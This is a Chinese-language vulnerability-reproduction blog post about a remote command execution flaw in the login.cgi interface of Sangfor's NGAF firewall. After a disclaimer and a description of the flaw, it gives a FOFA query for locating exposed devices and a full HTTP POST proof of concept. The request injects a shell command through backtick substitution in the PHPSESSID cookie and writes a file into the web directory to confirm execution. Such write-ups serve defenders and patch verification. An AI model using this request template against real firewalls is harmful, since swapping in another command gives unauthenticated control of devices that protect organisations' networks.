漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞

免责申明

安全小天地的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

漏洞描述

深信服下一代防火墙(Next-Generation Application Firewall)NGAF是面向应用层设计,能够精确识别用户、应用和内容,具备完整安全防护能力,能够全面替代传统防火墙,并具有强劲应用层处理能力的全新网络安全设备。深信服下一代防火墙(Next-Generation Application Firewall)NGAF的login.cgi接口对用户传入的参数未进行有效的过滤,攻击者可利用该漏洞获取服务器的权限。

图片[1]-漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞-安全小天地

漏洞复现

fofa-qeury: app=\"SANGFOR-防火墙类产品\"

1.执行poc写入无害文件,访问该文件得到内容

POST /cgi-bin/login.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 112
Content-Type: Application/X-www-Form
Cookie: PHPSESSID=`$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt)`;
Accept-Encoding: gzip

{\"opr\":\"login\", \"data\":{\"user\": \"watchTowr\" , \"pwd\": \"watchTowr\" , \"vericode\": \"EINW\" , \"privacy_enable\": \"0\"}}

2.访问/svpn_html/qwer.txt路径

参考文章

本文转载自公众号:融云攻防实验室 深信服下一代防火墙远程命令执行

https://mp.weixin.qq.com/s/XtNoI3H_EIek4IFK_11DfA

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞19 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容